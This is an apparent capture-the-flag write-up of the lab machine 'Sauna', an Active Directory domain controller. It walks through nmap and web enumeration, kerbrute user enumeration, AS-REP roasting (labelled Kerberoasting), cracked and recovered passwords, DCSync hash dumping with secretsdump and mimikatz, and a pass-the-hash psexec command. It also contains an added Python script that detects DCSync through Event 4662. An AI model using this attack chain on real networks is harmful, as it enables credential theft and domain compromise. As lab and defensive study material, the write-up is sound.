NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-05 08:47:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open tcpwrapped
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Web directory enumeration
/images (Status: 301) [Size: 150] [--> http://10.10.10.175/images/]
/index.html (Status: 200) [Size: 32797]
/css (Status: 301) [Size: 147] [--> http://10.10.10.175/css/]
/contact.html (Status: 200) [Size: 15634]
/blog.html (Status: 200) [Size: 24695]
/about.html (Status: 200) [Size: 30954]
/. (Status: 200) [Size: 32797]
/fonts (Status: 301) [Size: 149] [--> http://10.10.10.175/fonts/]
/single.html (Status: 200) [Size: 38059]
Names on domain
Fergus Smith
Shaun Coins
Bowie Taylor
Hugo Bear
Sophie Driver
Steven Kerb
We can use a script to generate all possible username combinations from this list and save them as user.txt. Then we confirm which of those names are valid domain users with kerbrute, and run GetNPUsers against the valid ones to see which accounts return a Kerberos hash.
python3 userlistcreator.py
./kerbrute_linux_amd64 userenum user.txt -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175
fsmith is a valid login
Kerberoasting attack
python3 GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -dc-ip 10.10.10.175 -outputfile hashes.txt -no-pass -format hashcat -usersfile fsmith.txt
The returned hash cracks to Thestrokes23
fsmith:Thestrokes23
Found creds for svc_loanmgr:
DefaultUserName : EGOTISTICALBANK\svc_loanmgr
DefaultPassword : Moneymakestheworldgoround!
I had to cheat for this part as BloodHound would not work for me. But we have GetChanges and GetChangesAll, and BloodHound shows us how to exploit this.
We can dump the admin's hashes with these commands:
secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Hash from secretsdump (LM:NT):
aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
Hash from mimikatz:
d9485863c1e9e05851aa40cbb4ab9dff
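From the defender's side, the GetChanges/GetChangesAll abuse above leaves a trace: every replication request is logged on the DC as Security Event ID 4662 with the replication control-access-right GUIDs in its Properties field. The script below is an added example, not part of the original writeup; the event records are constructed, and it assumes SAUNA$ is the only domain controller account that should ever replicate.

```python
# Added example (not from the original writeup): flag DCSync-style replication
# requests in Windows Security Event ID 4662 records. The writeup's svc_loanmgr
# account holds GetChanges/GetChangesAll, which is exactly what these events show
# being exercised. All event records below are constructed for illustration.
from dataclasses import dataclass

# Well-known control-access-right GUIDs for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Principals expected to replicate: DC computer accounts (names end in "$") and any
# approved backup/sync accounts. Assumption: SAUNA$ is the only DC in this domain.
ALLOWED_PRINCIPALS = {"SAUNA$"}


@dataclass
class Alert:
    subject: str
    rights: list


def detect_dcsync(events):
    """Return an Alert for each 4662 event where a non-allowlisted principal
    exercised a replication right (AccessMask 0x100 = Control Access)."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        props = ev.get("Properties", "").lower()
        hit = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if not hit:
            continue  # some other extended right, not replication
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in ALLOWED_PRINCIPALS:
            continue  # normal DC-to-DC replication
        alerts.append(Alert(subject, hit))
    return alerts


# Constructed sample records: DC replication, a DCSync by a user account, and an
# unrelated extended-right access that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "AccessMask": "0x100",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"DCSync suspect: {a.subject} used {', '.join(a.rights)}")
```

Event 4662 carries no client IP, so in practice the SubjectLogonId is correlated with the matching 4624 logon event to find where the request came from.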
Pass the hash attack
impacket-psexec egotistical-bank.local/administrator@10.10.10.175 -hashes "aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e"